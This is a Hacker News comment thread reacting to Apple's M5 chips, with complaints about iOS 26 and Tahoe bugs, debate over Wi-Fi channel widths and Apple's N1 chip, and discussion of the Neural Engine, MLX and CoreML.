      * Similarly, if I use my phone as a remote, why do I need to manually click out of the remote to get to the parental control approval screen? I'm literally using my phone. Just auto-approve.

    • strbean 5 hours ago

      > * Why can I not punch in a password while Face ID is working? If I'm skiing, I know Face ID isn't going to work; stop making me wait.

      Funny, a similar thing has been driving me crazy on my Ubuntu 20.04 laptop with fingerprint login. When unlocking, I can either enter a password or use fingerprint. On boot, I am not allowed to enter a password until I fail with fingerprint. If I use fingerprint to log in on boot, I have to enter my password anyways once logged in to unlock my keychain.

      I should probably just figure out a way to disable fingerprint on boot and only use it for the lock screen.

    • sample2 4 hours ago

      I see the same bug with the remote on my phone. How did they manage to break volume control in the app while keeping it working from the lock screen’s “Now Playing”?

      I’ve also been unable to get the remote app on my watch to work at all. It’s hard to imagine people working at Apple don’t also run into these issues all the time.

    • sotix 5 hours ago

      Why can I not use my password manager for my Apple ID when I can use it for any other password field? Instead, I have to switch to my password manager, copy the password, reopen the App Store, select get app, and paste the password into the Apple ID login pop-up in the 10 seconds before my password clears from my clipboard.

      • mschuster91 4 hours ago

        It's been ages, but I think you can mitigate that annoyance by approving purchases with your fingerprint.

    • sgt 4 hours ago

      I highly recommend the Apple remote... then you also don't need to take your phone with you when you are watching TV, which is an added benefit for some.

      Of course, the thin Apple remote has a way of getting lost, but it has a Find My feature which locates it pretty well.

      • SkyPuncher 4 hours ago

        Remote is fine, but it's always stuck in a couch cushion.

        • K7PJP 2 hours ago

          There was a company or two that made cases for the older Apple remotes with the express purpose of making them larger, which I always thought was kind of funny. I would buy one for the current remote if one existed.

        • sgt 4 hours ago

          Same here... so we use that Find Remote functionality about once a month! Without it we'd be lost. Business idea: make a cover for the Apple remote that makes it bigger and harder to lose.

    • gxs 4 hours ago

      As someone who jumped on the Apple bandwagon at peak Apple and hasn’t been through all their ups and downs the way some die-hards have, it’s been super aggravating dealing with Apple’s shit lately - not what I signed up for all those years ago.

      It seems to have been degrading for a long time, but for me it’s this past year that it’s crossed into that threshold Android used to live in, where using the phone causes a physiological response from how aggravating it can be sometimes.

      I let my guard down and got too deep into the Apple ecosystem - I know better and always avoided getting myself into these situations in the past, but here I am.

      The phone sucks right now - super buggy - and they continue to remove/impose features that should be left as an option to the user. Yes, this has always been the knock on Apple, but I typically haven’t had an issue with their decisions - it’s just so bad now.

      Lesson (re)learned, and I will stay away from ecosystems - luckily the damage here is only for media.

      The minute I can get blue bubbles reliably on an Android, I’ll give the Pixel a shot again - if that sucks too, then maybe I’ll go back to my teenage years and start rooting devices again.

      • SkyPuncher 4 hours ago

        So, I still think the experience is generally better and more integrated than when I was on an Android device. I just find they're generally not really paying attention to user details the way they have in the past.

      • skinnymuch 4 hours ago

        How would you ever get blue bubbles reliably on Android? Are you talking about iMessage or something else?

        I am fully bought into the Apple ecosystem. Not sure yet if I regret it. It is annoying to be so tied down to one company that isn’t going the way I want it to.

        • gxs 2 hours ago

          Yeah iMessage - over the years there have been “breakthroughs” - people find nifty workarounds or have even reverse engineered the iMessage protocol, but for whatever reason nothing ever sticks

          There are current workarounds, like using your home Mac as a relay, but nothing super elegant that I know of.

  • port11 3 hours ago

    It's incredible what the hardware teams at Apple have been doing. I imagine they also feel let down by the software that's driving these beasts. It's as if they're two completely different companies.

    • kenjackson 3 hours ago

      The latest iPhone OS (iOS 26) is embarrassing. The number of glitches and amount of UI sloppiness is crazy for a company that historically prided itself on the details. It's the first major iOS update I've taken that just seems almost strictly worse than its predecessor.

      • paweladamczuk 2 hours ago

        I remember using my first Apple product years ago, it was an iPod touch 4th gen. The quality of the software on that thing was in a completely different league compared to anything I had used before.

        I also installed the iOS 26 update recently. The competitive advantage of software polish that Apple had seems totally gone.

        Add to that bugs in iCloud, AirDrop... I don't think I will be buying any more Apple devices for myself.

      • georgel 2 hours ago

        This feels more like a repeat of iOS7 to me.

      • kossTKR 2 hours ago

        A small silver lining: if the world's largest company can ship complete garbage like this, don't feel bad about your own small mistakes. I mean, I've hotfixed and done my fair share of production reverts - but never, never anything as bad as this.

        Disclaimer: I actually like a bit of "bling", but both Tahoe and iOS are so filled with glitches and errors, while the UX is bizarrely inconsistent, that it really is catastrophically bad.

  • greg5green 4 hours ago

    >The M5 MacBook Pro still gets the Broadcom WiFi chip but the M5 iPad Pros get the N1 and C1X (Sweet).

    Is that good? Their cellular modems have been terrible. I'll reserve judgement until trying one out.

    >The M1 itself is so powerful

    I think this is a bit of a fallacy. Apple Silicon is great for the performance-to-power-consumption ratio, but something like a Ryzen 9 7945HX can do 3x more work than an M1 Max. And a non-laptop chip, like an Intel Core Ultra 7 265K, can do 3.5x.

  • kwanbix 4 hours ago

    I really wish Apple sold the Mx to others, like Lenovo.

    I would love to see a ThinkPad with an M5 running Linux.

    • fph 4 hours ago

      What is the Linux experience on new Mac hardware? I'd be interested also in running a Macbuntu.

      • bmdhacks 4 hours ago

        Asahi Linux is essentially in a holding pattern, with support only up to M2. Likely Linux will never be supported above M2, and even M2 has a lot of rough edges. When my monitor sleeps on M2 Linux, it can never reawaken without a reboot.

  • ksec 8 hours ago

    The Broadcom WiFi chip supports 320 MHz channels while the N1 is stuck with 160 MHz. There were reports of the N1 not supporting 4096-QAM as well, but I didn't check.
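
    For scale, the theoretical peak PHY rates (a back-of-the-envelope sketch using the standard 802.11be OFDM parameters; real-world throughput is far lower, as the replies note):

        # Peak 802.11be (Wi-Fi 7) PHY rate per spatial stream:
        # data_subcarriers * bits_per_symbol * coding_rate / symbol_duration
        SYMBOL_S = 13.6e-6                 # 12.8 us symbol + 0.8 us guard interval
        DATA_SUBCARRIERS = {160: 1960, 320: 3920}

        def phy_rate_gbps(width_mhz, qam_bits=12, coding=5 / 6, streams=1):
            """qam_bits=12 is 4096-QAM; coding 5/6 is the highest rate."""
            sc = DATA_SUBCARRIERS[width_mhz]
            return sc * qam_bits * coding * streams / SYMBOL_S / 1e9

        print(f"160 MHz: {phy_rate_gbps(160):.2f} Gb/s per stream")  # ~1.44
        print(f"320 MHz: {phy_rate_gbps(320):.2f} Gb/s per stream")  # ~2.88

    Doubling the channel width doubles the peak rate on paper, which is where the headline numbers come from.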

    • ExoticPearTree 7 hours ago

      > The Broadcom WiFi chip supports 320 MHz channels while the N1 is stuck with 160 MHz.

      I was at a Wi-Fi vendor presentation a while back and they said that 160 MHz is pretty improbable unless you're living alone with no wireless networks around you. And 320 MHz even less so.

      In real life, probably the best you can get is 80 MHz in a really good wireless environment.

      • shadowpho 6 hours ago

        For which band? I run 160/160 on 5/6 GHz and it’s nice. They are short-range enough to work. For 2.4 GHz, yeah, 20 MHz only.

        • greg5green 4 hours ago

          For 5 GHz, that's pretty unusual. You need to be somewhere where DFS isn't an issue to even get 160 MHz.

          For 6 GHz? Yeah, not uncommon.

      • amluto 6 hours ago

        I would believe that MLO or similar features could make it a bit more likely that large amounts of bandwidth would be useful, as it allows using discontiguous frequencies.

        WiFi doesn't currently get anywhere near the bandwidth that these huge channels advertise in realistic environments.

        • astrange 4 hours ago

          OFDMA also makes it more useful, but I don't know if vendors actually use that in practice.

      • mrtesthah 4 hours ago

        Indeed, in any relatively dense setting no one should even think about using channels that wide. Think about the original problem with 2.4 GHz 802.11b/g: there were only three non-overlapping channels, so you had interference no matter where you went. Why would we want to return to that hell?

        • 0x457 an hour ago

          My limited experience:

          2.4 GHz is pretty much only used by IoT; you generally don't care about channel width there. When your client device (laptop, phone) downgrades to 2.4 GHz, it might as well disconnect, because it's unusable.

          5 GHz gets stopped by drywall, so unless your walls are just right to bounce the signal off, you need an AP in every room. Ceiling mounting is pretty much required, and you're pretty much free to use channels as wide as your device supports and local laws allow.

          6 GHz gets stopped by a piece of paper, so the same as 5 GHz, except you won't get 6 GHz unless you have a direct line of sight to the AP.

    • Avamander 3 hours ago

      Channel width is not the only thing that determines the usability or quality of a chipset though.

      Reducing Broadcom's influence over the WiFi ecosystem alone would be a large benefit.

    • HumblyTossed 8 hours ago

      "stuck".

      An infinitely small percentage of people can take advantage of 320Mhz. It's fine.

      • londons_explore 7 hours ago

        Today. But in 3 years' time it'll be widespread, and your Mac will be the one with the sluggish WiFi connection that jams up the airwaves for all other devices too.

        • landl0rd 4 hours ago

          It really won't, and there will be a ton of devices "jamming up" the airwaves. In most places the backhaul isn't fast enough for anyone to get any use out of 320 MHz channels, beyond maybe very large LAN file transfers, which are for some reason happening over WiFi?

          • fragmede 2 hours ago

            Thankfully, there has been nothing new to use computers for since 2022. Definitely no new technology that involves downloading different 10+ GiB files to test with, and users couldn't possibly conceive of a NAS, never mind owning one, because Netflix has never removed shows while people were watching them, breaking an assumed promise to users. ISP speeds are never ever going to improve either. Everyone knows that!

        • shwaj 5 hours ago

          How does it “jam up the airwaves” if it’s operating at a different frequency than the devices you say it will be jamming?

    • t-3 7 hours ago

      I doubt the number of people in both the "has no neighbors" and "owns Apple hardware" camps is significant at all.

    • MrBuddyCasino 7 hours ago

      I don’t think 4096-QAM is realistic anyway, except if your router is 10 cm away from your laptop.

  • dawnerd 6 hours ago

    I’m still daily-driving my M1 Max and have no reason to upgrade for a long time. There’s really nothing in my workflow that could be markedly improved performance-wise. The only thing is maybe more RAM, as the need for that keeps growing - I’m just under 30GB when running a bunch of containers.

  • seunosewa 4 hours ago

    My M1 Air got very sluggish after upgrading to Tahoe but then it started behaving normally after a couple of days. Hopefully, you'll experience the same soon.

  • Insanity 7 hours ago

    Yeah I love my M1 iPad Pro. But the "liquid glass" update made it feel slower. Really only the 'unlock' feels slower; once I'm using it, it's fine. But it's slightly annoying and does make me want to upgrade this year to the M5.

    But it's a glorified Kindle and YouTube box, so I'm hesitating a little bit.

    • asimovDev 7 hours ago

      My dad's got a pre-AS iPad Pro and it's so bad after updating to 26. My 6th gen iPad on iOS 17 felt faster than this.

      • baq an hour ago

        I have a 5th gen? Can’t even remember now, it’s so old. Nothing works anymore except Netflix, YouTube and Disney, and those only after a minute or so.

        Which is fine, since it’s exclusively used to watch a kids’ show for half an hour a day.

        …but it’s also super sad to see a once fantastic piece of kit degrade so much, primarily due to software.

    • knowitnone3 6 hours ago

      "make me want to update this year to the m5." Then Apple software devs did what they were told

  • dimal 2 hours ago

    Seems like the software teams are there to simply squander the extra processing power that the hardware teams provide, thus ensuring recurring revenue. I see no good reason to upgrade to Tahoe. I’d have to buy a new computer just so I could power transparencies that I don’t want.

    • bsimpson 2 hours ago

      This feels like it's always been true.

      Devices get slower for no perceivable reason, when in reality software at all levels makes ever-greater assumptions about how much power you have, and squanders it more readily.

  • DecentShoes an hour ago

    They always release a slowdown update to destroy their older hardware. I don't know why you're even questioning it

  • JumpCrisscross 4 hours ago

    > Tahoe, however, makes my M1 Air feel sluggish

    Counterpoint: my M1 Pro was a turtle for a few weeks and then stopped doing nonsense in the background and is back to its zippy self. (Still buggy. But that would be true on new hardware, too.)

    • quadyeast 3 hours ago

      mediaanalysisd has been consuming ~140% CPU since upgrading a few weeks ago. I just turned off Apple Intelligence and it dropped to 0%.

  • lelandfe 8 hours ago

    As a UI/UX nerd, it’s a coin flip on intentionality. I’ve been noticing so many rough edges in Apple’s software where it used to astound. iOS Settings search will flash “No Results” as you begin to type, which is comically amateurish. The macOS menu bar control panels can’t be keyboard-navigated... It’s just silly.

    I’ve been debating making a Tumblr-style blog, something like “dumbapple.com,” to catalogue all the dumb crap I notice.

    • vessenes 7 hours ago

      Liquid Glass feels rushed to me. Tons of UI annoyances, especially on iPhone - it's suddenly many clicks to get to prior calls, for instance, a core way I call people. I'm imagining it will get ironed out over the next two years.

      • bombcar 3 hours ago

        It really does. It’s a two-year update, and they should have had two teams - one working on Liquid Glass for the next release, and one doing a Snow Leopard-type cleanup for this year. Let the Mac and iPhone be a bit out of sync if needed.

    • jtbayly 6 hours ago

      Please do this. Here are some examples to add to your list, leaving out the 26.0 bugs that I've come to expect running a .0 release.

      1. I won't focus on a bunch of Siri items, but one example that always bugs me: I cannot ask Siri to give me directions to my next meeting. The latest OS introduces an answer for the first time, though. It tells me to open the calendar app on my Apple watch, and tap on the meeting, and tap the address. (I don't have an Apple watch.)

      2. Mail.app on iOS does not have a "share sheet." This makes it impossible to "do" anything with an email message, like send it to a todo app. (The same problem exists with messages in Messages.app)

      3. It is impossible to share a contact card from Messages.app (both iOS and macOS). You have to leave Messages, go to Contacts, and select the contact to share. Contacts should be one of the apps that shows up in the "+" list like photos, camera, cash, and plenty of third-party apps.

      4. You still have to set the default system mail app in macOS as a setting in Mail.app, instead of in System Settings. Last I checked, I'm pretty sure you couldn't do this without first setting up an account in Mail.app. Infuriating.

      • grincho 5 hours ago

        I had that complaint about Mail too. Then I realized you can begin dragging an email (from the list view), switch apps with your other hand, and drop it into, say, a todo. Of course, this is less discoverable, so I agree a Share button would not go amiss.

    • jerf 5 hours ago

      "iOS Settings search will flash “No Results” as you begin to type which is comically amateurish."

      I'd love to agree that it's comically amateurish, but apparently there's something about settings dialogs that makes them incredibly difficult to search. It takes Android several seconds to search its settings, and the Microsoft Start menu is also comically slow if you try to access control panels through it, although it's comically slow at search in general. Even Brave here visibly chokes for ~200 ms if I search in its preferences dialog... which compared to Android or Windows is instant, but still strikes me as on the slow side considering the small space of things being searched. Although it looks like it may be more related to layout than actual searching.

      Still. I dunno why but a lot of settings searches are mind-bogglingly slow.

      (The only thing I can guess at is that the search is done by essentially fully instantiating the widgets for all screens and doing a full layout pass and extracting the text from them and frankly that's still not really accounting for enough time for these things. Maybe the Android search is blocked until the Storage tab is done crawling over the storage to generate the graphs that are not even going to be rendered? That's about what it would take to match the slowdown I see... but then the Storage tab happily renders almost instantly before that crawl is done and updates later... I dunno.)

      • robenkleene 5 hours ago

        The parent isn't commenting about the speed of search, just that saying "No Results", when they really mean "we're still checking for results" is bad UI (which I agree with).

        • array_key_first an hour ago

          The speed is bad too. At least on Android, it does actually take 5-10 seconds sometimes. That's not an exaggeration.

          It should be searching, what, a few hundred strings? What is it doing? Is it making a network call? For what?

          Anyway, barely related, but it does bring into question the quality of modern software.

        • fodkodrasz 3 hours ago

          It is possibly the null-object pattern in action, which is a good thing in my opinion (as in robust), though displaying it this way is a bit suboptimal.

          Funny that I'm defending them, but I don't think this is even a papercut, while they have far bigger issues.

          • fragmede 2 hours ago

            I'm sure this is me seeing the past through rose-colored glasses, but the reason bits of visual pollution like that are particularly annoying is that Apple shit used to be so exceptionally polished. Not sure what emotion I want to project onto them as to why they're like this now (or if it's even actually true), but the perception is that if they're no longer getting little stuff like that polished, what else isn't being done to the same high standard?

            • NetMageSCW 30 minutes ago

              Lots of things. iOS has never implemented the iPod USB interface properly and whoever thought listing music alphabetically was a good default should be fired.

      • vizzier 4 hours ago

        Might have to be more specific than Android and Windows. Tried them on my devices (S24, windows 11) and they're practically instantaneous.

      • SoKamil 4 hours ago

        The old System Preferences search was lightning fast compared to current SwiftUI System Settings on macOS.

    • butlike 7 hours ago

      IIRC, there's a setting to make the menu bar navigable. You just need to "alt+tab" to it with some weird button combo, like Ctrl+Cmd+1 or something.

      • lelandfe 7 hours ago

        You can turn on "Full Keyboard Access," which paints a hideous rectangle around anything you focus but does allow keyboard access to everything.

        But, like, man - why can't I just use the arrow keys to select my WiFi network anymore? I was able to for a decade.

        And the answer, of course, is the same for so much of macOS' present rough edges. Apple took some iPadOS interface elements, rammed them into the macOS UI, and still have yet to sand the welds. For how much we complain on HN about Electron, we really need to be pissed about Catalyst/Marzipan.

        Why does the iCloud sign in field have me type on the right side of an input? Why does that field have an iPadOS cursor? Why can't I use Esc to close its help sheet? Why aren't that sheet's buttons focusable?

        Why does the Stocks app have a Done button appear when I focus its search field? Why does its focus ring lag behind the search field's animated size?

        Where in the HIG does it sign off on unfocusable text-only bolded buttons, like Maps uses? https://imgur.com/a/e7PB5jm

        ...Anyway.

  • butlike 7 hours ago

    I think it's probably a play to get you to upgrade for the new GPU computational power. I _do_ think that what we're seeing (and what's marketed as AI) will be the future, but I don't think it will look like what we're seeing now. Whatever that future holds will require the upgraded capabilities of these new GPU architectures, and this being a reason for the subtle nudge from Apple to upgrade makes sense to me.

    It feels very much like how I imagine someone living in the late 1800s might have felt. The advent of electricity, the advent of cars, but unable to predict airplanes, even though they were right around the corner and they'd likely see them in their lifetime.

  • pantalaimon 8 hours ago

    Won't that make Linux support even harder :/

  • WhitneyLand 7 hours ago

    “nobody really needs to upgrade that for most things”

    Maybe, but for lots of scenarios even M5 could still benefit from being an order of magnitude faster.

    AI, dev, some content scenarios, etc…

  • antipaul 4 hours ago

    Which is harder these days, software or hardware?

    • DSingularity 4 hours ago

      Each challenging in their own ways. The real challenge is that we need codesign and that’s the tricky part.

  • random3 5 hours ago

    This needs benchmarks.

    Sad if true. I've felt my M1 Max getting sluggish too lately, after bragging that this was the longest-lived work machine I've had and thinking I'm good to wait for the M6. This is not good for business, but IMO you need more than raw power to justify upgrades even for professional use - form factor, screen quality, battery, etc.

    I think they bet a lot of hardware money on AI capabilities but failed to deliver the software, so there was no real reason to upgrade because of the AI features in the chip (which is literally what they boast about on the first line of the announcement - yet nobody cares about making more cute faces).

    It's not 100% their fault. Everyone got onto the LLM bandwagon like it's "the thing", so even if they didn't believe it they still needed something. Except an OS is not a chat interface, and LLMs do suck at stricter things.

  • lawlessone 5 hours ago

    >The M1 itself is so powerful that nobody really needs to upgrade that for most things most people do on their computers

    A rant on my part, but a computer from 10 years ago would be fine for what most people do on their computers, if not for software bloat.

  • phamduongtria 3 hours ago

    Even the M4 Max MacBooks I tried in the stores were running like shit on Tahoe.

  • thenaturalist 6 hours ago

    Don't kid yourself: planned obsolescence is real.

    Apple has a higher duty to their shareholders than to their customers.

    Not hating on Apple, just stating the hard economic truth.

    • NetMageSCW 28 minutes ago

      Nope, never been real, never will be real. Just conspiracy theories like all the others.

      PS The Earth isn’t flat. We did go to the Moon. Vaccines don’t cause autism.

  • imcritic 8 hours ago

    [flagged]

    • mumber_typhoon 8 hours ago

      What I have seen with iPhones is that the RAM has gone from 4 GB to 12 GB very quickly, compared to how it went from 1 GB to 3 GB.

      Apps used to use less RAM, but over the years apps have become big and more complicated. This is probably why older iPhones feel sluggish: newer iPhones have more memory, so apps snap back faster, and they also have faster storage and more memory bandwidth, reducing the latency of reading all that data from flash.

      Batteries are also a problem, as maintaining voltage is difficult for a 2-3 year old battery. An official battery swap at Apple service for a 3-year-old iPhone will make it run much better.

      I used to believe (and sometimes I still do) that Apple intentionally makes everything heavier to make old phones and devices feel slower, but I don't think that's the case.

      I think more is happening on newer phones and devices, and the same task feels slower on an older device. This happens a lot faster on iPhones and phones in general (a year or two) as opposed to Macs/computers, which can show signs of aging in 4-5 years.

      My 2018 Intel computer feels very slow in 2025 running GNOME. No one slowed it down. It's just that the 2025 world of software is a lot heavier, and 2026 will be even more so, and so on.

      • bloppe 7 hours ago

        Apple has been proven to intentionally slow down older devices, but it's definitely not to inflate their profits. It's just a way to kindly preserve your old battery for you. And they try to keep it a secret from you so you don't get confused.

        • rsynnott 7 hours ago

          … Eh? It was neither. It was due to a design defect in a particular model; if voltage fell into a range that was perfectly possible with an aging but still functional battery, the SoC would shut off. The only viable software fix was to clock it down instead (there was an option to decline that and risk the abrupt shutoffs).

          Not really sure what else they could have done there.

          • bloppe 7 hours ago

            It's not a particular model. It's every model. And it's just interesting that no other manufacturer seems to have the same problem. iPhones are just too advanced, I suppose.

      • HumblyTossed 8 hours ago

        Apps are heavier because a lot of them do not use native code. It's all cross platform BS. And they include a lot of A/B code as well. Really wish Apple would nip that all in the bud.

    • the_other 7 hours ago

      My iPhone X worked fine for 7 years, even without a battery replacement. It still works just fine. I wanted a larger screen and better zoom lens, so I upgraded earlier this year but I absolutely didn't have to and didn't feel any pressure from Apple to do so.

      n=1.

    • alimbada 8 hours ago

      I've been using an iPhone 11 for 4 years now (also, reminder: the 11 was launched 2 years prior to when I bought mine). I replaced the battery earlier this year as it wouldn't last to the end of the day any more but besides that it's showing no slowdowns or any other issues.

      • bombcar 8 hours ago

        Do you have iOS 26 on it? That pigdog is making my 15 Pro Max sweat and cry.

        • icedchai 7 hours ago

          I have an iPhone 13 and haven't upgraded yet. Sounds like I should hold off.

          • criddell 7 hours ago

            I have an iPhone 13 Mini and upgraded it to iOS 26, and it seems fine to me.

            I also have a 2018 iPad Pro and put iPadOS 26 on it, and I haven't had any issues with it either, except that sometimes my keyboard is slow to connect. I'm not sure if that's the software or the hardware though.

          • bombcar 7 hours ago

            I haven't really found anything that blew my socks off, and the number of "strange bugs" (not even talking about the UI complaints, just things like "touch stops working suddenly" and other weird things) is too damn high.

            • icedchai 6 hours ago

              I'll probably wait for 26.1 then!

        • alimbada 8 hours ago

          I only just upgraded to iOS 18 recently. I'm unlikely to go to 26 unless there's a good reason to do so.

        • rsynnott 7 hours ago

          Never, ever, upgrade to any Apple OS until at least .1. .0 is _always_ broken.

        • chasd00 7 hours ago

          i don't see what the big deal is with iOS 26. it looks a little bit different, everything now seems to have some degree of transparency but everything works the same.

    • tempoponet 7 hours ago

      They support their phones for years longer than any other vendor. This has been widely understood for probably 10+ years at this point.

      There's plenty of room for criticism without a blanket conspiracy that doesn't match what most can observe.

    • endemic 7 hours ago

      No more than any other company.

  • wartywhoa23 3 hours ago

    > ...The <thing I own right now> is so powerful that nobody really needs to upgrade...

    I keep hearing this since the Intel 486DX times, and

    > Nobody will ever need more than 640K of RAM!

    • bombcar 3 hours ago

      This is the first time I’ve gone four+ years without even a real desire to upgrade, I have a hard time figuring out even what would be faster.

      Amusingly enough, adding more ports could do it.

hannesfur 7 hours ago

It’s unfortunate that this announcement is still unspecific about what they improved in the Neural Engine. Since all we know about the Neural Engine comes from Apple papers or reverse engineering efforts (https://github.com/hollance/neural-engine), it’s plausible that they addressed some quirks to enable better transformer performance. They have written quite interesting papers on transformers on the Neural Engine:

- https://machinelearning.apple.com/research/neural-engine-tra...

- https://machinelearning.apple.com/research/vision-transforme...

Things have definitely gotten better with MLX on the software side, though it still seems they could do more in that area (let’s see what the M5 Max brings). But even if they made big strides here, it won’t help previous generations, and the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

  • trymas 7 hours ago

    > the main thing limiting Apple Intelligence (in my opinion) will continue to be the 8 GB of unified memory they still insist on.

    As you said - it won't help previous generations, though since last year (or two?) all Macs start with 16 GB of memory. Even entry-level MacBook Airs.

    • hannesfur 7 hours ago

      That's true! I was referring to their wider lineup, especially the iPad, where users will expect the same performance as on the Macs (they paid for an Mx chip), and they sold me an iPad Air this year that comes with a really fast M3 and still only 8 GB of RAM (you only get 16 GB on the iPad Pro, btw, if you go with at least 1 TB of storage on the M4 one).

      • doug_durham 4 hours ago

        "They sold me"? You me you bought.

      • moi2388 7 hours ago

        Why would you expect the same performance on iPad and MacBook Pro?

        The latter has up to 128GB of memory?

        • hannesfur 6 hours ago

          You probably wouldn't with a Pro, but you might between an iPad Pro and a MacBook Air. With the Foundation Models API they basically said that there will be one size of model for the entire platform, making smarter models on a MacBook Pro unrealistic and only faster ones possible.

          • LoganDark 6 hours ago

            Isn't Private Cloud Compute already enabling the more powerful models to be run on the server? That way the on-device models don't have as much pressure to be The One.

    • raverbashing 6 hours ago

      I bet Cook authorized the upgrade through gritted teeth, and I was all for it.

  • liuliu 7 hours ago

    Faster compute helps for things like vision language models that require a bigger context to be filled. My understanding is that the ANE is still optimized for convolution loads and compute efficiency, while the new neural accelerators are optimized for flexibility and performance.

    • zozbot234 7 hours ago

      The old ANE enabled arbitrary statically scheduled multiply-add, of INT8 or FP16. That's good for convolution but not specifically geared for it.

      • liuliu 5 hours ago

        I am not an expert on the ANE, but I think it is related to the size of the register files and how that is smaller than what we need for GEMM on modern transformers (especially the fat ones with MoE).

        • zozbot234 5 hours ago

          AIUI the ANE makes use of data in unified memory, not in the register file. So this wouldn't be an inherent limitation. (OTOH, that's why it wastes memory bandwidth for most newer transformer models, which use heavily quantized data - the ANE will have to read padded/unquantized values and the fraction of memory bandwidth that's used for that padding is pure waste.)
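
          To put a rough number on that padding overhead, here's a back-of-the-envelope sketch in Python (the model size and bit widths are illustrative assumptions, not measurements):

              # Reading 4-bit quantized weights as padded FP16 vs. consuming
              # them natively: how much memory bandwidth goes to padding.
              params = 7e9                     # assume a 7B-parameter model
              bits_quant, bits_padded = 4, 16  # 4-bit weights padded to FP16

              read_gb = lambda bits: params * bits / 8 / 1e9
              print(f"native quantized read: {read_gb(bits_quant):.1f} GB/pass")
              print(f"padded FP16 read:      {read_gb(bits_padded):.1f} GB/pass")
              print(f"bandwidth wasted:      {1 - bits_quant / bits_padded:.0%}")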

    • hannesfur 7 hours ago

      That would be an interesting approach if true. I hope someone gets to the bottom of it once we have hardware in our hands.

  • fooblaster 7 hours ago

    MLX doesn't use the neural engine still right? I still wish they would abandon that unit and just center everything around metal and tensor units on the GPU.

    • hannesfur 7 hours ago

      Oh, I overlooked that! You are right. Surprising… since Apple has shown that it’s possible through CoreML (https://github.com/apple/ml-ane-transformers)

      I would hope that the Foundation Models (https://developer.apple.com/documentation/foundationmodels) use the neural engine.
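
      For anyone wanting to poke at this, coremltools does let you at least request the Neural Engine at conversion time. A minimal sketch, assuming coremltools >= 6 and a stand-in PyTorch model (whether the ANE actually runs it is still up to the CoreML runtime):

          import torch
          import coremltools as ct

          net = torch.nn.Linear(256, 256).eval()  # stand-in model (assumption)
          example = torch.randn(1, 256)
          traced = torch.jit.trace(net, example)

          mlmodel = ct.convert(
              traced,
              inputs=[ct.TensorType(shape=example.shape)],
              convert_to="mlprogram",
              # Ask the runtime to prefer the CPU and Neural Engine:
              compute_units=ct.ComputeUnit.CPU_AND_NE,
          )
          mlmodel.save("linear.mlpackage")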

      • fooblaster 6 hours ago

        The Neural Engine not having a native programming model makes it effectively a dead end for external model development. It seems like a legacy unit that was designed for CNNs with limited receptive fields, and it just isn't programmable enough to be useful for the full set of models and operators available today.

        • hannesfur 5 hours ago

          That's sadly true; over in x86 land things don't look much better, in my opinion. The corresponding accelerators on modern Intel and AMD CPUs (the "Copilot PCs") are very difficult to program as well. I would love to read a blog post about someone trying, though!

    • zozbot234 7 hours ago

      Wrt. language models/transformers, the neural engine/NPU is still potentially useful for the pre-processing step, which is generally compute-limited. For token generation you need memory bandwidth so GPU compute with neural/tensor accelerators is preferable.
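
      The bandwidth argument is easy to sanity-check with arithmetic; a rough ceiling for a memory-bound decode step, with all numbers being illustrative assumptions:

          # tokens/s is capped by how fast the weights can be streamed:
          # every generated token reads (roughly) all the weights once.
          bandwidth_bytes = 150e9  # assume ~150 GB/s unified memory
          params = 8e9             # assume an 8B-parameter model
          bytes_per_param = 0.5    # 4-bit quantized weights

          ceiling = bandwidth_bytes / (params * bytes_per_param)
          print(f"~{ceiling:.0f} tokens/s upper bound")  # ~38 tokens/s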

      • fooblaster 7 hours ago

        I think I'd still rather have the hardware area put into tensor cores for the GPU instead of this unit that's only programmable with ONNX.

    • llm_nerd 6 hours ago

      MLX is a training/research framework, and the work product is usually a CoreML model. A CoreML model will use any and all resources that are available to it, at least if the resource fits for the need.

      The ANE is for very low power, very specific inference tasks. There is no universe where Apple abandons it, and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs. The ANE is how your iPhone extracts every bit of text from images and subject matter information from photos with little fanfare or heat, or without destroying your battery, among many other uses. It is extremely useful for what it does.

      >tensor units on the GPU

      The M5 / A19 Pro are the first chips with so-called tensor units, i.e. matmul on the GPU. The ANE used to be the only tensor-like thing on the system, albeit, as mentioned, designed to be super efficient and for very specific purposes. That doesn't mean Apple is going to abandon the ANE; instead they made it faster and more capable again.

      • zozbot234 5 hours ago

        > ...and it's super weird how much anti-ANE rhetoric there is on this site, as if there can only be one tool for an infinite selection of needs

        That seems like a strange comment. I've remarked in this thread (and other threads on this site) about what's known re: low-level ANE capabilities, and it seems to have significant potential overall, even for some part of LLM processing. I'm not expecting it to be best-in-class at everything, though. Just like most other NPUs that are also showing up on recent laptop hardware.

      • almostgotcaught 6 hours ago

        > the work product is usually a CoreML model.

        What work product? Who is running models on Apple hardware in prod?

        • llm_nerd 6 hours ago

          An enormous number of people and products. I'm actually not sure if your comment is serious, because it seems to be of the "I don't, therefore no one does" variety.

          • bigyabai 5 hours ago

            Enormous compared to what? Do you have any numbers, or are you going off what your X/Bluesky feed is telling you?

            • llm_nerd 5 hours ago

              I'm super not interested in arguing with the peanut gallery (meaning people who don't know the platform but feel that they have absolute knowledge of it), but enough people have apps with CoreML models in them, running across a billion or so devices. Some of those models were developed or migrated with MLX.

              You don't have to believe this. I could not care less if you don't.

              Have a great day.

              • kanaffa12345 5 hours ago

                > I'm super not interested in arguing with the peanut gallery

                I love blustery nerds, lol. What if I told you I'm a CoreML contributor and I know for a fact you're wrong?

                • llm_nerd 5 hours ago

                  Logging into the alt for this? Good god.

                  It would help if you would explain what I said that is wrong. You know, as the "haven't logged in in three years but pulled out the alt for this" CoreML contributor you are. This is an especially weird bit of trolling given that nothing I said is remotely contentious; it's all utterly banal fact.

                  • koolala 4 hours ago

                    Can you share an example of the apps you mean? Maybe it would clear up any confusion.

              • bigyabai 5 hours ago

                I don't believe it. MLX is a proprietary model format and usually the last to get supported on Huggingface. Given that most iOS users aren't selecting their own models, I genuinely don't think your conjecture adds up. The majority of people are likely using safetensors and GGUF, not MLX.

                If you had a source to cite then it would remove all doubt pretty quickly here. But your assumptions don't seem to align with how iOS users actually use their phone.

                • llm_nerd 5 hours ago

                  Cite a source? That CoreML models are prolific on Apple platforms? That Apple devices are prolific? Search for it yourself.

                  You seem set on MLX and apparently on your narrow view of what models are. This discussion was about ANE vs "tensor" units on the GPU, and someone happened to mention MLX in that context. I clarified the role of MLX, but that from an inference perspective most deployments are CoreML, which will automatically use ANE if the model or some subset fits (which is actually fairly rare as it's a very limited -- albeit speedy and power efficient -- bit of hardware). These are basic facts.

